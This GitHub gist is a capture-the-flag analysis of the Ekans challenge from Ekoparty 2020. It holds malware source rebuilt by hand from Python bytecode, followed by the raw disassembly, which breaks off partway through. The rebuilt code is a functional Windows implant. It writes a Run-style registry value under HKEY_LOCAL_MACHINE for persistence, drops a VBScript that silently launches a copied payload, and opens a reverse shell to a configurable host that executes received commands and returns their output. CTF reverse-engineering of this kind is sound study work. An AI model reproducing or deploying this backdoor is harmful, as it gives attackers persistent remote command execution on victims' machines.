Last active
September 29, 2020 14:40
-
-
Save maurom/325e9ec3c26c17f78a47ab3c056d275c to your computer and use it in GitHub Desktop.
ekans-explained.py is a hand-made recovery of the Ekans challenge of Ekoparty Main-CTF 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # ekans-explained.py | |
| # | |
| # ekans-explained.py is a hand-made recovery of the Ekans challenge of Ekoparty Main-CTF 2020 | |
| import base64 # added due to its usage on line | |
| import inspect # added due to its usage on line | |
| import os # added due to its usage on line | |
| import socket # added due to its usage on line | |
| import subprocess # added due to its usage on line | |
| # added to provide such functions and constants | |
| #from winreg import EnumValue, OpenKey, SetValueEx, HKEY_LOCAL_MACHINE, KEY_ALL_ACCESS, REG_SZ | |
| # the following constants are used later on this script, but we don't know their values | |
| KEY_NAME = '' | |
| KEY_PATH = '' | |
| REV_SHELL = '' | |
| SHELL_PORT = '' | |
| TRIGGER_PATH = '' | |
| MALWARE_NAME = '' | |
| MALWARE_PATH = '' | |
| # Disassembly of EdOxwEACgFH: | |
| class EdOxwEACgFH: | |
| # Disassembly of AC8AAxkqHjQGPxcvCzwdKGQ8: | |
| def AC8AAxkqHjQGPxcvCzwdKGQ8(self): | |
| # 27 0 LOAD_FAST 0 (self) | |
| # 2 LOAD_ATTR 0 (__class__) | |
| # 4 LOAD_ATTR 1 (__name__) | |
| # 6 LOAD_METHOD 2 (encode) | |
| # 8 CALL_METHOD 0 | |
| # 10 STORE_FAST 1 (mask) | |
| mask = self.__class__.__name__.encode() | |
| # 28 12 LOAD_GLOBAL 3 (len) | |
| # 14 LOAD_FAST 1 (mask) | |
| # 16 CALL_FUNCTION 1 | |
| # 18 STORE_FAST 2 (lmask) | |
| lmask = len(mask) | |
| # 29 20 LOAD_FAST 0 (self) | |
| # 22 LOAD_METHOD 4 (NRYgDBImHhwT) | |
| # 24 LOAD_GLOBAL 5 (base64) | |
| # 26 LOAD_METHOD 6 (b64decode) | |
| # 28 LOAD_GLOBAL 7 (inspect) | |
| # 30 LOAD_METHOD 8 (currentframe) | |
| # 32 CALL_METHOD 0 | |
| # 34 LOAD_ATTR 9 (f_code) | |
| # 36 LOAD_ATTR 10 (co_name) | |
| # 38 CALL_METHOD 1 | |
| # 40 CALL_METHOD 1 | |
| # 42 POP_TOP | |
| self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name)) | |
| # 30 44 LOAD_GLOBAL 11 (OpenKey) | |
| # 46 LOAD_GLOBAL 12 (HKEY_LOCAL_MACHINE) | |
| # 48 LOAD_GLOBAL 13 (KEY_PATH) | |
| # 50 CALL_FUNCTION 2 | |
| # 52 STORE_FAST 3 (key) | |
| key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH) | |
| # 31 54 BUILD_LIST 0 | |
| # 56 STORE_FAST 4 (keys) | |
| keys = [] | |
| # 32 58 SETUP_FINALLY 42 (to 102) | |
| try: | |
| # 33 60 LOAD_CONST 1 (0) | |
| # 62 STORE_FAST 5 (i) | |
| i = 0 | |
| while True: | |
| # 35 >> 64 LOAD_GLOBAL 14 (EnumValue) | |
| # 66 LOAD_FAST 3 (key) | |
| # 68 LOAD_FAST 5 (i) | |
| # 70 CALL_FUNCTION 2 | |
| # 72 STORE_FAST 6 (cur_key) | |
| cur_key = EnumValue(key, i) | |
| # 36 74 LOAD_FAST 4 (keys) | |
| # 76 LOAD_METHOD 15 (append) | |
| # 78 LOAD_FAST 6 (cur_key) | |
| # 80 LOAD_CONST 1 (0) | |
| # 82 BINARY_SUBSCR | |
| # 84 CALL_METHOD 1 | |
| # 86 POP_TOP | |
| keys.append(cur_key[0]) | |
| # 37 88 LOAD_FAST 5 (i) | |
| # 90 LOAD_CONST 2 (1) | |
| # 92 INPLACE_ADD | |
| # 94 STORE_FAST 5 (i) | |
| i += 1 | |
| # 96 JUMP_ABSOLUTE 64 | |
| # 98 POP_BLOCK | |
| # 100 JUMP_FORWARD 12 (to 114) | |
| except: | |
| pass # goto bytecode 114 | |
| # | |
| # 38 >> 102 POP_TOP | |
| # 104 POP_TOP | |
| # 106 POP_TOP | |
| # | |
| # 39 108 POP_EXCEPT | |
| # 110 JUMP_FORWARD 2 (to 114) | |
| # 112 END_FINALLY | |
| # 40 >> 114 LOAD_GLOBAL 16 (KEY_NAME) | |
| # 116 LOAD_FAST 4 (keys) | |
| # 118 COMPARE_OP 7 (not in) | |
| # 120 POP_JUMP_IF_FALSE 164 | |
| if KEY_NAME not in keys: | |
| # 41 122 LOAD_GLOBAL 11 (OpenKey) | |
| # 124 LOAD_GLOBAL 12 (HKEY_LOCAL_MACHINE) | |
| # 126 LOAD_GLOBAL 13 (KEY_PATH) | |
| # 128 LOAD_CONST 1 (0) | |
| # 130 LOAD_GLOBAL 17 (KEY_ALL_ACCESS) | |
| # 132 CALL_FUNCTION 4 | |
| # 134 STORE_FAST 7 (mlwr_key) | |
| mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS) | |
| # 42 136 LOAD_GLOBAL 18 (SetValueEx) | |
| # 138 LOAD_FAST 7 (mlwr_key) | |
| # 140 LOAD_GLOBAL 16 (KEY_NAME) | |
| # 142 LOAD_CONST 1 (0) | |
| # 144 LOAD_GLOBAL 19 (REG_SZ) | |
| # 146 LOAD_GLOBAL 20 (TRIGGER_PATH) | |
| # 148 CALL_FUNCTION 5 | |
| # 150 POP_TOP | |
| SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH) | |
| # 43 152 LOAD_FAST 7 (mlwr_key) | |
| # 154 LOAD_METHOD 21 (Close) | |
| # 156 CALL_METHOD 0 | |
| # 158 POP_TOP | |
| mlwr_key.close() | |
| # 44 160 LOAD_CONST 3 (False) | |
| # 162 RETURN_VALUE | |
| return False | |
| # 45 >> 164 LOAD_CONST 4 (True) | |
| # 166 RETURN_VALUE | |
| return True | |
| # Disassembly of AwE5HQU2JDAPIyQp: | |
| def AwE5HQU2JDAPIyQp(self): | |
| # 65 0 LOAD_FAST 0 (self) | |
| # 2 LOAD_ATTR 0 (__class__) | |
| # 4 LOAD_ATTR 1 (__name__) | |
| # 6 LOAD_METHOD 2 (encode) | |
| # 8 CALL_METHOD 0 | |
| # 10 STORE_FAST 1 (mask) | |
| mask = self.__class__.__name__.encode() # 65 | |
| # 66 12 LOAD_FAST 0 (self) | |
| # 14 LOAD_METHOD 3 (NRYgDBImHhwT) | |
| # 16 LOAD_GLOBAL 4 (base64) | |
| # 18 LOAD_METHOD 5 (b64decode) | |
| # 20 LOAD_GLOBAL 6 (inspect) | |
| # 22 LOAD_METHOD 7 (currentframe) | |
| # 24 CALL_METHOD 0 | |
| # 26 LOAD_ATTR 8 (f_code) | |
| # 28 LOAD_ATTR 9 (co_name) | |
| # 30 CALL_METHOD 1 | |
| # 32 CALL_METHOD 1 | |
| # 34 POP_TOP | |
| self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name)) | |
| # 67 36 LOAD_GLOBAL 10 (socket) | |
| # 38 LOAD_METHOD 10 (socket) | |
| # 40 LOAD_GLOBAL 10 (socket) | |
| # 42 LOAD_ATTR 11 (AF_INET) | |
| # 44 LOAD_GLOBAL 10 (socket) | |
| # 46 LOAD_ATTR 12 (SOCK_STREAM) | |
| # 48 CALL_METHOD 2 | |
| # 50 STORE_FAST 2 (s) | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # 68 52 LOAD_FAST 2 (s) | |
| # 54 LOAD_METHOD 13 (connect) | |
| # 56 LOAD_GLOBAL 14 (REV_SHELL) | |
| # 58 LOAD_GLOBAL 15 (SHELL_PORT) | |
| # 60 BUILD_TUPLE 2 | |
| # 62 CALL_METHOD 1 | |
| # 64 POP_TOP | |
| s.connect((REV_SHELL, SHELL_PORT)) # | |
| # 69 66 LOAD_CONST 1 (b'JgsiFRYrJWNHfGhl') | |
| # 68 STORE_FAST 3 (flag) | |
| flag = b'JgsiFRYrJWNHfGhl' | |
| # 70 70 LOAD_FAST 2 (s) | |
| # 72 LOAD_METHOD 16 (send) | |
| # 74 LOAD_CONST 2 ('\n\\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n') | |
| # 76 CALL_METHOD 1 | |
| # 78 POP_TOP | |
| s.send('\n\\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n') | |
| while True: | |
| # 72 >> 80 LOAD_FAST 2 (s) | |
| # 82 LOAD_METHOD 17 (recv) | |
| # 84 LOAD_CONST 3 (1024) | |
| # 86 CALL_METHOD 1 | |
| # 88 STORE_FAST 4 (data) | |
| data = s.recv(1024) | |
| # 73 90 LOAD_CONST 4 ('quit') | |
| # 92 LOAD_FAST 4 (data) | |
| # 94 COMPARE_OP 6 (in) | |
| # 96 POP_JUMP_IF_FALSE 100 | |
| if 'quit' in data: | |
| # 74 98 JUMP_ABSOLUTE 180 | |
| break | |
| # 75 >> 100 LOAD_GLOBAL 18 (subprocess) | |
| # 102 LOAD_ATTR 19 (Popen) | |
| # 104 LOAD_FAST 4 (data) | |
| # 106 LOAD_CONST 5 (True) | |
| # 108 LOAD_GLOBAL 18 (subprocess) | |
| # 110 LOAD_ATTR 20 (PIPE) | |
| # 112 LOAD_GLOBAL 18 (subprocess) | |
| # 114 LOAD_ATTR 20 (PIPE) | |
| # 116 LOAD_GLOBAL 18 (subprocess) | |
| # 118 LOAD_ATTR 20 (PIPE) | |
| # 120 LOAD_CONST 6 (('shell', 'stdout', 'stderr', 'stdin')) | |
| # 122 CALL_FUNCTION_KW 5 | |
| # 124 STORE_FAST 5 (cmd) | |
| cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) # bytecode 100 (o al reves?) | |
| # 76 126 LOAD_FAST 5 (cmd) | |
| # 128 LOAD_ATTR 21 (stdout) | |
| # 130 LOAD_METHOD 22 (read) | |
| # 132 CALL_METHOD 0 | |
| # 134 LOAD_FAST 5 (cmd) | |
| # 136 LOAD_ATTR 23 (stderr) | |
| # 138 LOAD_METHOD 22 (read) | |
| # 140 CALL_METHOD 0 | |
| # 142 BINARY_ADD | |
| # 144 STORE_FAST 6 (saida_cmd) | |
| saida_cmd = cmd.stdout.read() + cmd.stderr.read() | |
| # 77 146 LOAD_FAST 2 (s) | |
| # 148 LOAD_METHOD 16 (send) | |
| # 150 LOAD_FAST 6 (saida_cmd) | |
| # 152 CALL_METHOD 1 | |
| # 154 POP_TOP | |
| s.send(saida_cmd) | |
| # 78 156 LOAD_FAST 2 (s) | |
| # 158 LOAD_METHOD 16 (send) | |
| # 160 LOAD_FAST 0 (self) | |
| # 162 LOAD_METHOD 3 (NRYgDBImHhwT) | |
| # 164 LOAD_GLOBAL 4 (base64) | |
| # 166 LOAD_METHOD 5 (b64decode) | |
| # 168 LOAD_FAST 3 (flag) | |
| # 170 CALL_METHOD 1 | |
| # 172 CALL_METHOD 1 | |
| # 174 CALL_METHOD 1 | |
| # 176 POP_TOP | |
| s.send(self.NRYgDBImHhwT(base64.b64decode(flag))) | |
| # 178 JUMP_ABSOLUTE 80 | |
| # 79 >> 180 LOAD_FAST 2 (s) | |
| # 182 LOAD_METHOD 24 (close) | |
| # 184 CALL_METHOD 0 | |
| # 186 POP_TOP | |
| # 188 LOAD_CONST 7 (None) | |
| # 190 RETURN_VALUE | |
| s.close() | |
| # Disassembly of LQ0rHSgoIC8QJzog: | |
| def LQ0rHSgoIC8QJzog(self): | |
| # 51 0 LOAD_FAST 0 (self) | |
| # 2 LOAD_ATTR 0 (__class__) | |
| # 4 LOAD_ATTR 1 (__name__) | |
| # 6 LOAD_METHOD 2 (encode) | |
| # 8 CALL_METHOD 0 | |
| # 10 STORE_FAST 1 (mask) | |
| mask = self.__class__.__name__.encode() | |
| # 52 12 LOAD_GLOBAL 3 (len) | |
| # 14 LOAD_FAST 1 (mask) | |
| # 16 CALL_FUNCTION 1 | |
| # 18 STORE_FAST 2 (lmask) | |
| lmask = len(mask) | |
| # 53 20 LOAD_FAST 0 (self) | |
| # 22 LOAD_METHOD 4 (NRYgDBImHhwT) | |
| # 24 LOAD_GLOBAL 5 (base64) | |
| # 26 LOAD_METHOD 6 (b64decode) | |
| # 28 LOAD_GLOBAL 7 (inspect) | |
| # 30 LOAD_METHOD 8 (currentframe) | |
| # 32 CALL_METHOD 0 | |
| # 34 LOAD_ATTR 9 (f_code) | |
| # 36 LOAD_ATTR 10 (co_name) | |
| # 38 CALL_METHOD 1 | |
| # 40 CALL_METHOD 1 | |
| # 42 POP_TOP | |
| self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name)) | |
| # 54 44 LOAD_GLOBAL 11 (os) | |
| # 46 LOAD_ATTR 12 (path) | |
| # 48 LOAD_METHOD 13 (exists) | |
| # 50 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| # 52 CALL_METHOD 1 | |
| # 54 POP_JUMP_IF_FALSE 72 | |
| # 56 LOAD_GLOBAL 11 (os) | |
| # 58 LOAD_ATTR 12 (path) | |
| # 60 LOAD_METHOD 13 (exists) | |
| # 62 LOAD_GLOBAL 15 (TRIGGER_PATH) | |
| # 64 CALL_METHOD 1 | |
| # 66 POP_JUMP_IF_FALSE 72 | |
| if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH): | |
| # 55 68 LOAD_CONST 1 (True) | |
| # 70 RETURN_VALUE | |
| return True | |
| else: | |
| # 57 >> 72 LOAD_CONST 2 ('Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false') | |
| # 74 LOAD_METHOD 16 (format) | |
| # 76 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| # 78 CALL_METHOD 1 | |
| # 80 STORE_FAST 3 (payload) | |
| payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH) | |
| # 58 82 LOAD_GLOBAL 17 (open) | |
| # 84 LOAD_GLOBAL 15 (TRIGGER_PATH) | |
| # 86 LOAD_CONST 3 ('w') | |
| # 88 CALL_FUNCTION 2 | |
| # 90 SETUP_WITH 16 (to 108) | |
| # 92 STORE_FAST 4 (f) | |
| with open(TRIGGER_PATH, 'w') as f: | |
| # 59 94 LOAD_FAST 4 (f) | |
| # 96 LOAD_METHOD 18 (write) | |
| # 98 LOAD_FAST 3 (payload) | |
| # 100 CALL_METHOD 1 | |
| f.write(payload) | |
| # 102 POP_TOP | |
| # 104 POP_BLOCK | |
| # 106 BEGIN_FINALLY | |
| # >> 108 WITH_CLEANUP_START | |
| # 110 WITH_CLEANUP_FINISH | |
| # 112 END_FINALLY | |
| # 60 114 LOAD_GLOBAL 11 (os) | |
| # 116 LOAD_METHOD 19 (system) | |
| # 118 LOAD_CONST 4 ('copy %s %s') | |
| # 120 LOAD_GLOBAL 20 (MALWARE_NAME) | |
| # 122 LOAD_GLOBAL 14 (MALWARE_PATH) | |
| # 124 BUILD_TUPLE 2 | |
| # 126 BINARY_MODULO | |
| # 128 CALL_METHOD 1 | |
| # 130 POP_TOP | |
| os.system('copy %s %s' % (MALWARE_NAME, MALWARE_PATH)) | |
| # 61 132 LOAD_CONST 5 (False) | |
| # 134 RETURN_VALUE | |
| return False | |
| # 136 LOAD_CONST 6 (None) | |
| # 138 RETURN_VALUE | |
| # Disassembly of NRYgDBImHhwT: | |
| def NRYgDBImHhwT(self, byt): | |
| # 22 0 LOAD_FAST 0 (self) | |
| # 2 LOAD_ATTR 0 (__class__) | |
| # 4 LOAD_ATTR 1 (__name__) | |
| # 6 LOAD_METHOD 2 (encode) | |
| # 8 CALL_METHOD 0 | |
| # 10 STORE_DEREF 1 (mask) | |
| mask = self.__class__.__name__.encode() | |
| # 23 12 LOAD_GLOBAL 3 (len) | |
| # 14 LOAD_DEREF 1 (mask) | |
| # 16 CALL_FUNCTION 1 | |
| # 18 STORE_DEREF 0 (lmask) | |
| lmask = len(mask) | |
| # 24 20 LOAD_GLOBAL 4 (bytes) | |
| # 22 LOAD_CLOSURE 0 (lmask) | |
| # 24 LOAD_CLOSURE 1 (mask) | |
| # 26 BUILD_TUPLE 2 | |
| # 28 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>) | |
| # 30 LOAD_CONST 2 ('EdOxwEACgFH.NRYgDBImHhwT.<locals>.<genexpr>') | |
| # 32 MAKE_FUNCTION 8 (closure) | |
| # 34 LOAD_GLOBAL 5 (enumerate) | |
| # 36 LOAD_FAST 1 (byt) | |
| # 38 CALL_FUNCTION 1 | |
| # 40 GET_ITER | |
| # 42 CALL_FUNCTION 1 | |
| # 44 CALL_FUNCTION 1 | |
| # 46 RETURN_VALUE | |
| # | |
| #Disassembly of <code object <genexpr> at 0x7f0a5361b190, file "/tmp/mw.py", line 24>: | |
| # 24 0 LOAD_FAST 0 (.0) | |
| # >> 2 FOR_ITER 26 (to 30) | |
| # 4 UNPACK_SEQUENCE 2 | |
| # 6 STORE_FAST 1 (i) | |
| # 8 STORE_FAST 2 (c) | |
| # 10 LOAD_FAST 2 (c) | |
| # 12 LOAD_DEREF 1 (mask) | |
| # 14 LOAD_FAST 1 (i) | |
| # 16 LOAD_DEREF 0 (lmask) | |
| # 18 BINARY_MODULO | |
| # 20 BINARY_SUBSCR | |
| # 22 BINARY_XOR | |
| # 24 YIELD_VALUE | |
| # 26 POP_TOP | |
| # 28 JUMP_ABSOLUTE 2 | |
| # >> 30 LOAD_CONST 0 (None) | |
| # 32 RETURN_VALUE | |
| # | |
| return bytes(c ^ mask[i % lmask] for i, c in enumerate(byt)) | |
| # Disassembly of main: | |
| def main(): | |
| # 82 0 BUILD_LIST 0 | |
| # 2 STORE_FAST 0 (my_returns) | |
| my_returns = [] | |
| # 83 4 LOAD_GLOBAL 0 (EdOxwEACgFH) | |
| # 6 CALL_FUNCTION 0 | |
| # 8 STORE_FAST 1 (x) | |
| x = EdOxwEACgFH() | |
| # 84 10 LOAD_FAST 0 (my_returns) | |
| # 12 LOAD_METHOD 1 (append) | |
| # 14 LOAD_FAST 1 (x) | |
| # 16 LOAD_METHOD 2 (AC8AAxkqHjQGPxcvCzwdKGQ8) | |
| # 18 CALL_METHOD 0 | |
| # 20 CALL_METHOD 1 | |
| # 22 POP_TOP | |
| my_returns.append(x.AC8AAxkqHjQGPxcvCzwdKGQ8()) | |
| # 85 24 LOAD_FAST 0 (my_returns) | |
| # 26 LOAD_METHOD 1 (append) | |
| # 28 LOAD_FAST 1 (x) | |
| # 30 LOAD_METHOD 3 (LQ0rHSgoIC8QJzog) | |
| # 32 CALL_METHOD 0 | |
| # 34 CALL_METHOD 1 | |
| # 36 POP_TOP | |
| my_returns.append(x.LQ0rHSgoIC8QJzog()) | |
| # 86 38 LOAD_GLOBAL 4 (all) | |
| # 40 LOAD_CONST 1 (<code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>) | |
| # 42 LOAD_CONST 2 ('main.<locals>.<genexpr>') | |
| # 44 MAKE_FUNCTION 0 | |
| # 46 LOAD_FAST 0 (my_returns) | |
| # 48 GET_ITER | |
| # 50 CALL_FUNCTION 1 | |
| # 52 CALL_FUNCTION 1 | |
| # 54 POP_JUMP_IF_FALSE 64 | |
| # | |
| #Disassembly of <code object <genexpr> at 0x7f0a5361b660, file "/tmp/mw.py", line 86>: | |
| # 86 0 LOAD_FAST 0 (.0) | |
| # >> 2 FOR_ITER 14 (to 18) | |
| # 4 STORE_FAST 1 (res) | |
| # 6 LOAD_FAST 1 (res) | |
| # 8 LOAD_CONST 0 (True) | |
| # 10 COMPARE_OP 8 (is) | |
| # 12 YIELD_VALUE | |
| # 14 POP_TOP | |
| # 16 JUMP_ABSOLUTE 2 | |
| # >> 18 LOAD_CONST 1 (None) | |
| # 20 RETURN_VALUE | |
| if all(res is True for res in my_returns): | |
| # 87 56 LOAD_FAST 1 (x) | |
| # 58 LOAD_METHOD 5 (AwE5HQU2JDAPIyQp) | |
| # 60 CALL_METHOD 0 | |
| # 62 POP_TOP | |
| x.AwE5HQU2JDAPIyQp() | |
| # >> 64 LOAD_CONST 0 (None) | |
| # 66 RETURN_VALUE | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Disassembly of EdOxwEACgFH: | |
| Disassembly of AC8AAxkqHjQGPxcvCzwdKGQ8: | |
| 27 0 LOAD_FAST 0 (self) | |
| 2 LOAD_ATTR 0 (__class__) | |
| 4 LOAD_ATTR 1 (__name__) | |
| 6 LOAD_METHOD 2 (encode) | |
| 8 CALL_METHOD 0 | |
| 10 STORE_FAST 1 (mask) | |
| 28 12 LOAD_GLOBAL 3 (len) | |
| 14 LOAD_FAST 1 (mask) | |
| 16 CALL_FUNCTION 1 | |
| 18 STORE_FAST 2 (lmask) | |
| 29 20 LOAD_FAST 0 (self) | |
| 22 LOAD_METHOD 4 (NRYgDBImHhwT) | |
| 24 LOAD_GLOBAL 5 (base64) | |
| 26 LOAD_METHOD 6 (b64decode) | |
| 28 LOAD_GLOBAL 7 (inspect) | |
| 30 LOAD_METHOD 8 (currentframe) | |
| 32 CALL_METHOD 0 | |
| 34 LOAD_ATTR 9 (f_code) | |
| 36 LOAD_ATTR 10 (co_name) | |
| 38 CALL_METHOD 1 | |
| 40 CALL_METHOD 1 | |
| 42 POP_TOP | |
| 30 44 LOAD_GLOBAL 11 (OpenKey) | |
| 46 LOAD_GLOBAL 12 (HKEY_LOCAL_MACHINE) | |
| 48 LOAD_GLOBAL 13 (KEY_PATH) | |
| 50 CALL_FUNCTION 2 | |
| 52 STORE_FAST 3 (key) | |
| 31 54 BUILD_LIST 0 | |
| 56 STORE_FAST 4 (keys) | |
| 32 58 SETUP_FINALLY 42 (to 102) | |
| 33 60 LOAD_CONST 1 (0) | |
| 62 STORE_FAST 5 (i) | |
| 35 >> 64 LOAD_GLOBAL 14 (EnumValue) | |
| 66 LOAD_FAST 3 (key) | |
| 68 LOAD_FAST 5 (i) | |
| 70 CALL_FUNCTION 2 | |
| 72 STORE_FAST 6 (cur_key) | |
| 36 74 LOAD_FAST 4 (keys) | |
| 76 LOAD_METHOD 15 (append) | |
| 78 LOAD_FAST 6 (cur_key) | |
| 80 LOAD_CONST 1 (0) | |
| 82 BINARY_SUBSCR | |
| 84 CALL_METHOD 1 | |
| 86 POP_TOP | |
| 37 88 LOAD_FAST 5 (i) | |
| 90 LOAD_CONST 2 (1) | |
| 92 INPLACE_ADD | |
| 94 STORE_FAST 5 (i) | |
| 96 JUMP_ABSOLUTE 64 | |
| 98 POP_BLOCK | |
| 100 JUMP_FORWARD 12 (to 114) | |
| 38 >> 102 POP_TOP | |
| 104 POP_TOP | |
| 106 POP_TOP | |
| 39 108 POP_EXCEPT | |
| 110 JUMP_FORWARD 2 (to 114) | |
| 112 END_FINALLY | |
| 40 >> 114 LOAD_GLOBAL 16 (KEY_NAME) | |
| 116 LOAD_FAST 4 (keys) | |
| 118 COMPARE_OP 7 (not in) | |
| 120 POP_JUMP_IF_FALSE 164 | |
| 41 122 LOAD_GLOBAL 11 (OpenKey) | |
| 124 LOAD_GLOBAL 12 (HKEY_LOCAL_MACHINE) | |
| 126 LOAD_GLOBAL 13 (KEY_PATH) | |
| 128 LOAD_CONST 1 (0) | |
| 130 LOAD_GLOBAL 17 (KEY_ALL_ACCESS) | |
| 132 CALL_FUNCTION 4 | |
| 134 STORE_FAST 7 (mlwr_key) | |
| 42 136 LOAD_GLOBAL 18 (SetValueEx) | |
| 138 LOAD_FAST 7 (mlwr_key) | |
| 140 LOAD_GLOBAL 16 (KEY_NAME) | |
| 142 LOAD_CONST 1 (0) | |
| 144 LOAD_GLOBAL 19 (REG_SZ) | |
| 146 LOAD_GLOBAL 20 (TRIGGER_PATH) | |
| 148 CALL_FUNCTION 5 | |
| 150 POP_TOP | |
| 43 152 LOAD_FAST 7 (mlwr_key) | |
| 154 LOAD_METHOD 21 (Close) | |
| 156 CALL_METHOD 0 | |
| 158 POP_TOP | |
| 44 160 LOAD_CONST 3 (False) | |
| 162 RETURN_VALUE | |
| 45 >> 164 LOAD_CONST 4 (True) | |
| 166 RETURN_VALUE | |
| Disassembly of AwE5HQU2JDAPIyQp: | |
| 65 0 LOAD_FAST 0 (self) | |
| 2 LOAD_ATTR 0 (__class__) | |
| 4 LOAD_ATTR 1 (__name__) | |
| 6 LOAD_METHOD 2 (encode) | |
| 8 CALL_METHOD 0 | |
| 10 STORE_FAST 1 (mask) | |
| 66 12 LOAD_FAST 0 (self) | |
| 14 LOAD_METHOD 3 (NRYgDBImHhwT) | |
| 16 LOAD_GLOBAL 4 (base64) | |
| 18 LOAD_METHOD 5 (b64decode) | |
| 20 LOAD_GLOBAL 6 (inspect) | |
| 22 LOAD_METHOD 7 (currentframe) | |
| 24 CALL_METHOD 0 | |
| 26 LOAD_ATTR 8 (f_code) | |
| 28 LOAD_ATTR 9 (co_name) | |
| 30 CALL_METHOD 1 | |
| 32 CALL_METHOD 1 | |
| 34 POP_TOP | |
| 67 36 LOAD_GLOBAL 10 (socket) | |
| 38 LOAD_METHOD 10 (socket) | |
| 40 LOAD_GLOBAL 10 (socket) | |
| 42 LOAD_ATTR 11 (AF_INET) | |
| 44 LOAD_GLOBAL 10 (socket) | |
| 46 LOAD_ATTR 12 (SOCK_STREAM) | |
| 48 CALL_METHOD 2 | |
| 50 STORE_FAST 2 (s) | |
| 68 52 LOAD_FAST 2 (s) | |
| 54 LOAD_METHOD 13 (connect) | |
| 56 LOAD_GLOBAL 14 (REV_SHELL) | |
| 58 LOAD_GLOBAL 15 (SHELL_PORT) | |
| 60 BUILD_TUPLE 2 | |
| 62 CALL_METHOD 1 | |
| 64 POP_TOP | |
| 69 66 LOAD_CONST 1 (b'JgsiFRYrJWNHfGhl') | |
| 68 STORE_FAST 3 (flag) | |
| 70 70 LOAD_FAST 2 (s) | |
| 72 LOAD_METHOD 16 (send) | |
| 74 LOAD_CONST 2 ('\n\\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n') | |
| 76 CALL_METHOD 1 | |
| 78 POP_TOP | |
| 72 >> 80 LOAD_FAST 2 (s) | |
| 82 LOAD_METHOD 17 (recv) | |
| 84 LOAD_CONST 3 (1024) | |
| 86 CALL_METHOD 1 | |
| 88 STORE_FAST 4 (data) | |
| 73 90 LOAD_CONST 4 ('quit') | |
| 92 LOAD_FAST 4 (data) | |
| 94 COMPARE_OP 6 (in) | |
| 96 POP_JUMP_IF_FALSE 100 | |
| 74 98 JUMP_ABSOLUTE 180 | |
| 75 >> 100 LOAD_GLOBAL 18 (subprocess) | |
| 102 LOAD_ATTR 19 (Popen) | |
| 104 LOAD_FAST 4 (data) | |
| 106 LOAD_CONST 5 (True) | |
| 108 LOAD_GLOBAL 18 (subprocess) | |
| 110 LOAD_ATTR 20 (PIPE) | |
| 112 LOAD_GLOBAL 18 (subprocess) | |
| 114 LOAD_ATTR 20 (PIPE) | |
| 116 LOAD_GLOBAL 18 (subprocess) | |
| 118 LOAD_ATTR 20 (PIPE) | |
| 120 LOAD_CONST 6 (('shell', 'stdout', 'stderr', 'stdin')) | |
| 122 CALL_FUNCTION_KW 5 | |
| 124 STORE_FAST 5 (cmd) | |
| 76 126 LOAD_FAST 5 (cmd) | |
| 128 LOAD_ATTR 21 (stdout) | |
| 130 LOAD_METHOD 22 (read) | |
| 132 CALL_METHOD 0 | |
| 134 LOAD_FAST 5 (cmd) | |
| 136 LOAD_ATTR 23 (stderr) | |
| 138 LOAD_METHOD 22 (read) | |
| 140 CALL_METHOD 0 | |
| 142 BINARY_ADD | |
| 144 STORE_FAST 6 (saida_cmd) | |
| 77 146 LOAD_FAST 2 (s) | |
| 148 LOAD_METHOD 16 (send) | |
| 150 LOAD_FAST 6 (saida_cmd) | |
| 152 CALL_METHOD 1 | |
| 154 POP_TOP | |
| 78 156 LOAD_FAST 2 (s) | |
| 158 LOAD_METHOD 16 (send) | |
| 160 LOAD_FAST 0 (self) | |
| 162 LOAD_METHOD 3 (NRYgDBImHhwT) | |
| 164 LOAD_GLOBAL 4 (base64) | |
| 166 LOAD_METHOD 5 (b64decode) | |
| 168 LOAD_FAST 3 (flag) | |
| 170 CALL_METHOD 1 | |
| 172 CALL_METHOD 1 | |
| 174 CALL_METHOD 1 | |
| 176 POP_TOP | |
| 178 JUMP_ABSOLUTE 80 | |
| 79 >> 180 LOAD_FAST 2 (s) | |
| 182 LOAD_METHOD 24 (close) | |
| 184 CALL_METHOD 0 | |
| 186 POP_TOP | |
| 188 LOAD_CONST 7 (None) | |
| 190 RETURN_VALUE | |
| Disassembly of LQ0rHSgoIC8QJzog: | |
| 51 0 LOAD_FAST 0 (self) | |
| 2 LOAD_ATTR 0 (__class__) | |
| 4 LOAD_ATTR 1 (__name__) | |
| 6 LOAD_METHOD 2 (encode) | |
| 8 CALL_METHOD 0 | |
| 10 STORE_FAST 1 (mask) | |
| 52 12 LOAD_GLOBAL 3 (len) | |
| 14 LOAD_FAST 1 (mask) | |
| 16 CALL_FUNCTION 1 | |
| 18 STORE_FAST 2 (lmask) | |
| 53 20 LOAD_FAST 0 (self) | |
| 22 LOAD_METHOD 4 (NRYgDBImHhwT) | |
| 24 LOAD_GLOBAL 5 (base64) | |
| 26 LOAD_METHOD 6 (b64decode) | |
